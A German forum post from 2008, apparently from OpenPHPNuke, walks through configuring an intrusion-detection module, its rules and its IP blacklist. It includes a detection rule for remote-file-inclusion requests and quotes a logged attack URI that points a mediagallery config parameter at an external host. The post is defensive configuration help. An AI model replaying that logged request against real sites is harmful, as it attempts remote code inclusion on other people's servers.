Autor spinne
Datum 31.01.2008 18:46
Beiträge: Alsoooo Eva!
Eva verführte dazumal den Adam...
Nein Spass bei Seite, ich werd euch da mal was zusammen schreibseln.
Fürs erste mal das Modul installieren und auch die Blacklist

Dann sollte (sofern mir gerade im Kopf ist) im Import schon etwas vorhanden sein, also da mal ne klick drauf und gucken was passiert
so ein paar sollten glaub ich schon definiert sein.

dann gibts unten *Hinzufügen*

(ggfs das durch den Import schon Einträge vorhanden sind, mal auf bearbeiten gehen, dann seht ihr die Einstellungen dafür)
wenn nicht, folgendes:

Beispiel:
Name: [ONR0001]
Benutze Regel: Benutzer definierte Regel
Benutzer definierte Regel: system/article/index.php?*=http
Aktion: Standard
Zur Blacklist hinzufügen: Ja
Aktionstext: frei wählbar
Beschreibung: [ONR0001]
Statistik Kategorie: 1

Dann, noch einen Eintrag hinzufügen:

Name: [TYPISCH]
Benutze Regel: typisch
Benutzer definierte Regel: leer
Aktion: Standard
Zur Blacklist hinzufügen: Ja
Alle weiteren Felder leer lassen

speichern.

Dann sollte, wenn ich richtig liege, Angriffe automatisch in die liste hinzugefügt werden oder abgewehrt, muss ich unseren Stefanchef dann auch nochmals genauer interviewen.

Weiter dann mit der IP Blacklist

Eine htaccess schreiben.

Dort werden dann die IP's gespeichert und man kann sehen wie oft ein Angriff verübt wurde, wenn man dort auf bearbeiten geht, sieht man auch z.B.:
Ausgelöst von der IP Adresse: 217.110.144.106 um 10.12.2007 19:04:21
Die URI die den Fehler ausgelöst hat war:
/var/www/web14/html/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????


REQUEST_URI=/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????

So und jetzt noch ein paar Infos

sowas.

Aja und bei der EVA.... da war noch was bei Einstellungen
automatisch abuse eMail senden?
auf ja stellen, dann bekommt ihr noch ne nette Mail zusätzlich
das ist aber noch nicht scharf geschaltet soviel ich weiss, das bekommen nur *wir* als Anwender.

Für Korrekturen hier, ist dann Stefan zuständig

Gruss Tine


Diese Seite drucken
Diese Seite schließen

Dieser Artikel kommt von: OpenPHPNuke - das Open Source CMS

http://www.openphpnuke.info/